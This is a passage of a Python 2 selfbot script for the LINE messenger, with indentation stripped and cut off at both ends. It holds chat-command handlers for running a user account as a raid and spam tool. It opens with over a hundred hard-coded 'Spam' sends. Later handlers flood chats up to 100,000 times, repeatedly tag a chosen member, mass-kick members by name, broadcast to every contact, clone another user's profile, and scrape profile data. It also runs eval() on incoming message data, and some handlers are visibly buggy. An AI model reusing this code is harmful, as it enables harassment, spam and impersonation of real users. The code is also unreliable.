cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(msg.to, "Done")
print " Spammed !"
#==============================================================================#
elif msg.text in ["Invite"]:
wait["invite"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Steal contact"]:
wait["contact"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama
print "[Command]Like executed"
cl.sendText(msg.to,"Like Status Owner")
try:
likeme()
except:
pass
elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman
print "[Command]Like executed"
cl.sendText(msg.to,"Like Status Teman")
try:
likefriend()
except:
pass
elif msg.text in ["Like:on","Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
elif msg.text in ["Like off","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
cl.sendText(msg.to,"Simi mode On")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
cl.sendText(msg.to,"Simi mode Off")
elif msg.text in ["Autoread on","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"Auto read On")
elif msg.text in ["Autoread off","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"Auto read Off")
elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto respon tag On")
elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto respon tag Off")
elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"Auto Kick tag ON")
elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Kick tag OFF")
elif "Time" in msg.text:
if msg.toType == 2:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
#==============================================================================#
elif "Cleanse" in msg.text:
if msg.toType == 2:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Cleanse","")
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ô")
cl.sendText(msg.to,"Group cleansed.")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[cl,cl,cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
cl.sendText(msg.to,"Group cleanse")
elif ("Kick " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Ulti " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
cl.inviteIntoGroup(msg.to,[target])
cl.cancelGroupInvitation(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Kick: " in msg.text:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif 'invite ' in msg.text.lower():
key = msg.text[-33:]
cl.findAndAddContactsByMid(key)
cl.inviteIntoGroup(msg.to, [key])
contact = cl.getContact(key)
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"Invitan tidak ada")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"Invitan tidak ada")
elif msg.text.lower() == 'link on':
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text.lower() == 'link off':
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close")
else:
cl.sendText(msg.to,"URL close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Url","Gurl"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
elif "Gcreator" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"Creator Grup")
elif msg.text.lower() == 'invite:gcreator':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if wait["lang"] == "JP":
cl.inviteIntoGroup(msg.to,[gcmid])
else:
cl.inviteIntoGroup(msg.to,[gcmid])
elif ("Gname: " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gname: ","")
cl.updateGroup(X)
elif msg.text.lower() == 'infogrup':
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text.lower() == 'grup id':
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#==============================================================================#
elif msg.text in ["Glist"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif msg.text.lower() == 'gcancel':
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku menolak semua undangan")
else:
cl.sendText(msg.to,"He declined all invitations")
elif "Auto add" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
elif "@bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
#==============================================================================#
elif "mention" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif "setpoint on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Setpoint already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "setpoint off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Setpoint already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "viewlastseen" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Reader:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = ''
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif "Gbroadcast: " in msg.text:
bc = msg.text.replace("Gbroadcast: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendText(i, bc)
elif "Cbroadcast: " in msg.text:
bc = msg.text.replace("Cbroadcast: ","")
gid = cl.getAllContactIds()
for i in gid:
cl.sendText(i, bc)
elif "Spam change: " in msg.text:
wait["spam"] = msg.text.replace("Spam change: ","")
cl.sendText(msg.to,"spam changed")
elif "Spam add: " in msg.text:
wait["spam"] = msg.text.replace("Spam add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam: " in msg.text:
strnum = msg.text.replace("Spam: ","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
else:
pass
elif "Spam" in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
cl.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
cl.sendImageWithURL(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
cl.sendVideoWithURL(msg.to,wait["pap"])
elif "TL:" in msg.text:
if msg.toType == 2:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#==============================================================================#
elif msg.text.lower() == 'mymid':
cl.sendText(msg.to,mid)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string + "")
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string)
elif msg.text in ["Myname"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = cl.getContact(mid)
cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpict @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getvid @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Picturl @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Coverurl @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Getgrup image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Urlgrup image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendText(msg.to,path)
elif "Mycopy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybackup","mybackup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
#==============================================================================#
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Translate-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Translate-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Translate-ar" in msg.text:
isi = msg.text.replace("Tr-ar ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Translate-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Translate-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**")
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
